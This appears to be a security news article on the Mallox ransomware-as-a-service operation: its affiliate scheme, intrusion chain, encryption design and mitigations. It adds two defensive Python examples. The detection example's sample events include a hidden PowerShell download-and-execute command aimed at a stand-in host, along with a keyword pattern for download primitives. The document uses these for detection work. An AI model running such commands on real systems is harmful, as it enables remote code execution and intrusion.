Mallox Ransomware Advertised on Dark Web Forums To Join its Team

Mallox, a ransomware-as-a-service (RaaS) operation, began its activities in early 2021. Initially, it employed a highly customized approach, targeting specific victims with unique encryption extensions and ransom notes. 

However, in 2022 Mallox moved to a more standardized model, adopting the “Mallox” moniker for all variants. The change coincided with an acquisition of the malware’s source code, suggesting a possible change of operators. 

The evolution of Mallox from a tailored to a standardized operation underscores its adaptability and the dynamic nature of the ransomware landscape.

The original ad for Mallox RaaS

The Mallox RaaS, launched in January 2023, recruits affiliates to infiltrate companies and launch ransomware attacks by offering 70-80% of the ransom to affiliates, prioritizing those with access to large networks. 

It has seen significant growth in affiliates in 2022 but has since declined. Despite this, the original five affiliates remain active, suggesting satisfaction with the program’s terms.


Mallox ransomware affiliates use various methods to infiltrate victim networks, including spam emails with malicious attachments, exploiting vulnerabilities in internet-facing database servers (MS SQL, PostgreSQL), and brute-force attacks. 

Once in, they typically leverage compromised server processes to download and execute a PowerShell script that fetches a malicious payload (often Remcos RAT or a .NET downloader), which then retrieves the actual encryption Trojan. 

This Trojan avoids encryption on systems with specific language settings (likely to evade detection in certain regions) and disables system defenses before encrypting files. 
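The intrusion chain described above (a compromised database server process launching PowerShell to fetch the next stage) is something a SOC can watch for in process-creation telemetry. The following detection logic is an added example written for this article, not code from the page or from any Mallox analysis; the process names are the standard MS SQL and PostgreSQL service images, the download keywords are generic PowerShell primitives rather than Mallox-specific indicators, and the sample events are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Database-server images named on the page as Mallox entry points (MS SQL, PostgreSQL).
DB_SERVER_IMAGES = {"sqlservr.exe", "postgres.exe"}
# Interpreters an affiliate would use to stage the next payload.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Generic download primitives seen in PowerShell command lines (assumption: a
# representative list, not indicators taken from a Mallox sample).
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.I,
)


@dataclass
class ProcessEvent:
    host: str
    parent_image: str  # full path of the parent process
    image: str         # full path of the newly created process
    command_line: str


def basename(path: str) -> str:
    """Return the file-name part of a Windows or POSIX path, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


def classify(event: ProcessEvent) -> Optional[str]:
    """Severity for one event, or None when it does not match the pattern.

    A database service spawning a shell is already unusual ("medium"); if the
    shell's command line also carries a download primitive, the event matches
    the staging step the article describes and is rated "high".
    """
    parent = basename(event.parent_image)
    child = basename(event.image)
    if parent in DB_SERVER_IMAGES and child in SHELL_IMAGES:
        if DOWNLOAD_RE.search(event.command_line):
            return "high"
        return "medium"
    return None


def detect(events: List[ProcessEvent]) -> List[Tuple[str, str, str, str]]:
    """Run classify() over a batch and return (host, severity, parent, child) findings."""
    findings = []
    for ev in events:
        severity = classify(ev)
        if severity:
            findings.append((ev.host, severity, basename(ev.parent_image), basename(ev.image)))
    return findings


# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    ProcessEvent("db01", r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\""),
    ProcessEvent("db02", r"C:\Program Files\PostgreSQL\15\bin\postgres.exe",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcessEvent("ws07", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell Invoke-WebRequest -Uri https://example.invalid/tool.zip"),
    ProcessEvent("db01", r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
                 r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlagent.exe", "sqlagent.exe"),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The third event (an interactive user running Invoke-WebRequest) is deliberately not flagged: the discriminating signal is the parent process, not the download cmdlet on its own, which keeps the rule quiet on ordinary administration.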

Mallox main function

Mallox encrypts data on specified drives using a multi-stage cryptographic scheme: it generates a unique identifier for each victim and uses an ECC key agreement to establish a shared secret for encryption. 

It encrypts files with ChaCha20 and AES-128, appends a technical buffer containing the information needed for decryption to each encrypted file, and sends victim information to a C&C server both before and after encryption.

The most recent version employs a more sophisticated key-generation scheme: it uses ECC and ECDH to derive a shared secret, encrypts files with AES-256 in GCM mode, and appends a larger technical buffer to the end of each encrypted file. 

The ransomware has additional features, including disabling services, terminating processes, and blocking shutdown or restart attempts. The Mallox developers likely modified the algorithm in this version to prevent decryption without the attacker’s private key.

Key generation scheme in the most recent Mallox version

It first collects device, network, and user information and sends it to a C&C server via HTTP POST; the server responds with “Successfully_added” on success. 

Mallox has evolved through 12 versions, with significant changes in encryption methods and features. The ransomware uses either generated or embedded keys for encryption. 

Victims are directed to a negotiation portal or email for ransom payment, which provides information about the victim’s case and stolen data. A data leak site lists compromised companies and stolen data.

Page with victim company details

According to Securelist, the Mallox ransomware, a RaaS, has been observed targeting vulnerable companies globally, with Brazil, Vietnam, and China experiencing the most infection attempts. 

To mitigate the risk of falling victim, organizations should avoid exposing RDP to public networks, keep VPN solutions and other software up to date, focus on detecting lateral movement and data exfiltration, and maintain regular data backups. 
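The first of those mitigations, not exposing RDP to public networks, can be turned into a repeatable check over a firewall rule set. The audit below is an added example written for this article, not code from the page; it generalizes the advice to the two database services the article names as Mallox entry points as well (the port numbers are the standard defaults for RDP, MS SQL and PostgreSQL, the rule schema is this example's own assumption, and the sample rules are constructed).

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Tuple

# Services the article names as Mallox entry points, keyed by their default TCP ports.
# The port numbers are the well-known defaults; the selection is this example's.
EXPOSED_SERVICE_PORTS = {3389: "RDP", 1433: "MS SQL", 5432: "PostgreSQL"}

# RFC 1918 ranges; any source outside them is treated as "public" for this check.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


@dataclass
class FirewallRule:
    name: str
    action: str    # "allow" or "deny"
    protocol: str  # "tcp", "udp" or "any"
    port: int      # destination port the rule applies to
    source: str    # CIDR of permitted sources


def is_public_source(cidr: str) -> bool:
    """True unless the whole source range sits inside a private (RFC 1918) network."""
    net = ipaddress.ip_network(cidr, strict=False)
    return not any(p.version == net.version and net.subnet_of(p) for p in PRIVATE_NETS)


def audit(rules: List[FirewallRule]) -> List[Tuple[str, str, int, str]]:
    """Return (rule name, service, port, source) for every allow rule that opens a
    sensitive service to a public source range."""
    findings = []
    for r in rules:
        if r.action.lower() != "allow" or r.protocol.lower() not in ("tcp", "any"):
            continue
        service = EXPOSED_SERVICE_PORTS.get(r.port)
        if service and is_public_source(r.source):
            findings.append((r.name, service, r.port, r.source))
    return findings


# Constructed sample rule set (203.0.113.0/24 is a documentation range, used here as a
# stand-in for an external partner network).
SAMPLE_RULES = [
    FirewallRule("allow-rdp-any", "allow", "tcp", 3389, "0.0.0.0/0"),
    FirewallRule("allow-rdp-vpn", "allow", "tcp", 3389, "10.0.0.0/8"),
    FirewallRule("allow-mssql-partner", "allow", "tcp", 1433, "203.0.113.0/24"),
    FirewallRule("allow-https", "allow", "tcp", 443, "0.0.0.0/0"),
    FirewallRule("deny-pg-any", "deny", "tcp", 5432, "0.0.0.0/0"),
]

if __name__ == "__main__":
    for name, service, port, source in audit(SAMPLE_RULES):
        print(f"{name}: {service} (tcp/{port}) reachable from {source}")
```

The check flags the RDP rule open to the whole internet and the MS SQL rule open to an external range, while the RDP rule restricted to the internal VPN range, the public HTTPS rule and the deny rule pass. In a real deployment the rule list would be read from the firewall or cloud security-group export rather than embedded.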

Kaaviya, https://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She covers various cyber security incidents happening in cyberspace.
